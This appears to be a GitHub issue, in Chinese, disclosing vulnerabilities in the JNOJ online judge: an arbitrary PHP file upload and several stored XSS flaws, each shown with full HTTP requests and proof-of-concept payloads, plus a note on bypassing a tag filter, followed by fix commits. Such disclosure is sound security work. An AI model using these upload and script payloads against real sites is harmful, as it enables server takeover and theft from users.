We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
1.任意文件上传.
代码位置: namespace app\modules\polygon\controllers\ProblemController. 213到228行.
namespace app\modules\polygon\controllers\ProblemController
public function actionTests($id) { $model = $this->findModel($id); $solutionStatus = Yii::$app->db->createCommand("SELECT * FROM {{%polygon_status}} WHERE problem_id=:pid AND language IS NULL", [ ':pid' => $model->id ])->queryOne(); if (Yii::$app->request->isPost) { $inputFile = file_get_contents($_FILES["file"]["tmp_name"]); file_put_contents($_FILES["file"]["tmp_name"], preg_replace("(\r\n)","\n", $inputFile)); @move_uploaded_file($_FILES["file"]["tmp_name"], Yii::$app->params['polygonProblemDataPath'] . $model->id . '/' . $_FILES["file"]["name"]); } return $this->render('tests', [ 'model' => $model, 'solutionStatus' => $solutionStatus ]); }
发一个HTTP请求内容如下:
POST /jnoj/web/polygon/problem/tests?id=2&file= HTTP/1.1 cache-control: no-cache Postman-Token: b3ac3880-1ebb-4446-8692-a1a7908d38fa User-Agent: PostmanRuntime/7.6.0 Accept: */* Host: 192.168.214.148:8111 Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=nh6rh8731c2702be06d9ug3klt Accept-Encoding: gzip, deflate content-type: multipart/form-data; boundary=--------------------------993388030406276728804269 Content-Length: 232 Connection: close ----------------------------993388030406276728804269 Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/png <?php echo phpinfo(); ?> ----------------------------993388030406276728804269--
请求成功后访问url
2.创建问题处标题存在,存储型xss漏洞
Payload
POST /jnoj/web/polygon/problem/create HTTP/1.1 Host: 192.168.214.148:8111 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 181 Connection: close Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/create Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D Upgrade-Insecure-Requests: 1 _csrf=wtOLGZhaHk5SqjzsMg6kdf_zGesVri1U1cqASZiZS_iPtdtJ4TBvETn7WqdbWdchh8dWsnSdWQGSgu0rwcMIjw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb
查看问题标题列表即可触发.
3.问题详情页面多处存在xss代码 编辑标题,进行内容补充修改.这里部分参数是由前端把html标签转义成html实体,然后传给PHP后端,这样写很不安全,抓包把对应的参数给修改就可以了,前端转义标签没有意义.修改后的参数如下.
POST /jnoj/web/polygon/problem/update?id=7 HTTP/1.1 Host: 192.168.214.148:8111 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1426 Connection: close Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/update?id=7 Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D Upgrade-Insecure-Requests: 1 _csrf=HgqxnDZE_N9BxUyJK4RbVDrSWuzPm90WE3rQuLHtVmxTbOHMTy6NgCqUKsJC0ygAQuYVta6oqUNUMr3a6LcVGw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[description]=<p>asd<script>alert('xss02')</script>;aaaabbbb</p>&Problem[input]=<p>aaaabbbb<script>alert('xss03')</script>>aaaabbbb</p>&Problem[output]=<p><script>alert('xss04')</script>aaaabbbb</p>&Problem[sample_input]=aaaabbbb<script>alert('xss 05')</script>aaaabbbb&Problem[sample_output]=aaaabbbb<script>alert('xss 06')</script>aaaabbbb&Problem[sample_input_2]=aaaabbbb<script>alert('xss 07')</script>aaaabbbb&Problem[sample_output_2]=aaaabbbb<script>alert('xss 08')</script>aaaabbbb&Problem[sample_input_3]=aaaabbbb<script>alert('xss 09')</script>aaaabbbb&Problem[sample_output_3]=aaaabbbb<script>alert('xss 10')</script>aaaabbbb&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p><script>alert('xss14')</p>&Problem[tags]=aaaabbbb<script>alert('xss 12')</script>aaaabbbb
查看问题详情时 会触发6次xss代码.
6次集中在这里
PHP后端处理对hint参数的过滤规则如下
namespace app\modules\polygon\models\Problem 123行 $hint = preg_replace("/(\s|\ \;| |\xc2\xa0)/", '', strip_tags($this->hint));
这样写可以被绕过.因为是先去掉html标签,在进行了一次替换.
这个参数在前端输出的时候,前端也进行了一次过滤,到是没有产生影响.
我看了下后台管理也有几处XSS漏洞.
4.在后台创建问题时,HTTP请求如下
POST /jnoj/web/admin/problem/create HTTP/1.1 Host: 192.168.214.148:8111 Content-Length: 847 Cache-Control: max-age=0 Origin: http://192.168.214.148:8111 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://192.168.214.148:8111/jnoj/web/admin/problem/create Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=itcn06esd5pbvo9173rcidfmbl Connection: close _csrf=uFlAFx9vAKQeVYitGnbYYkvqpzI2IseyK6l2-C1MwKP_CwdRKToz9Vgf8MEtOJk3LNjfWURn_4dO9huqbgOBlA==&Problem[id]=123&Problem[title]=<script>alert('xss')</script>&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[status]=&Problem[status]=0&Problem[description]=<p> </p>&Problem[input]=<p> </p>&Problem[output]=<p> </p>&Problem[sample_input]=<script>alert('xss')</script>&Problem[sample_output]=<script>alert('xss')</script>&Problem[sample_input_2]=&Problem[sample_output_2]=&Problem[sample_input_3]=&Problem[sample_output_3]=&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p> </p>&Problem[source]=&Problem[tags]=&Problem[contest_id]=
触发页面
5.后台设置页面,在设置页面加上xss代码后,前后台每个页面都会触发.
后面的这两个后台xss漏洞,因为要登录后台才行,危险性很小.
The text was updated successfully, but these errors were encountered:
7dde664
代码 app\modules\admin\controllers\ProblemController 307->317行 这里也有任意文件上传.
Sorry, something went wrong.
Fixes shi-yang#51: 修复一些漏洞
adff99f
2e88469
Former-commit-id: ba80cec1b13b6cb85945b4a3a572d5b0bccf7112
No branches or pull requests
1.任意文件上传.
代码位置:
namespace app\modules\polygon\controllers\ProblemController
. 213到228行.发一个HTTP请求内容如下:
请求成功后访问url
![200](https://user-images.githubusercontent.com/55778895/66270616-39893380-e888-11e9-97d2-15c58e3c99b6.png)
2.创建问题处标题存在,存储型xss漏洞
Payload
查看问题标题列表即可触发.
3.问题详情页面多处存在xss代码
编辑标题,进行内容补充修改.这里部分参数是由前端把html标签转义成html实体,然后传给PHP后端,这样写很不安全,抓包把对应的参数给修改就可以了,前端转义标签没有意义.修改后的参数如下.
Payload
查看问题详情时 会触发6次xss代码.
![600](https://user-images.githubusercontent.com/55778895/66271616-be794a80-e892-11e9-9596-e9d172f3925f.png)
6次集中在这里
![6001](https://user-images.githubusercontent.com/55778895/66271627-e36dbd80-e892-11e9-9afc-ebfd4d148c95.png)
![7001](https://user-images.githubusercontent.com/55778895/66271635-f6808d80-e892-11e9-8e43-3b24846ade08.png)
PHP后端处理对hint参数的过滤规则如下
这样写可以被绕过.因为是先去掉html标签,在进行了一次替换.
![00001](https://user-images.githubusercontent.com/55778895/66271713-eb7a2d00-e893-11e9-8d52-292a979833ba.png)
这个参数在前端输出的时候,前端也进行了一次过滤,到是没有产生影响.
我看了下后台管理也有几处XSS漏洞.
4.在后台创建问题时,HTTP请求如下
触发页面
![100](https://user-images.githubusercontent.com/55778895/66271825-2597fe80-e895-11e9-87e4-05b8b51fb586.png)
![10001](https://user-images.githubusercontent.com/55778895/66271832-30eb2a00-e895-11e9-85fc-95ccdbe29c4f.png)
![10003](https://user-images.githubusercontent.com/55778895/66271850-495b4480-e895-11e9-8569-d7c72df42444.png)
5.后台设置页面,在设置页面加上xss代码后,前后台每个页面都会触发.
![20000](https://user-images.githubusercontent.com/55778895/66271922-29785080-e896-11e9-909e-f2749ffa05a5.png)
![20001](https://user-images.githubusercontent.com/55778895/66271937-3eed7a80-e896-11e9-975b-ab85480c3209.png)
![200004](https://user-images.githubusercontent.com/55778895/66271942-44e35b80-e896-11e9-972a-5f0d620f9e72.png)
后面的这两个后台xss漏洞,因为要登录后台才行,危险性很小.
The text was updated successfully, but these errors were encountered: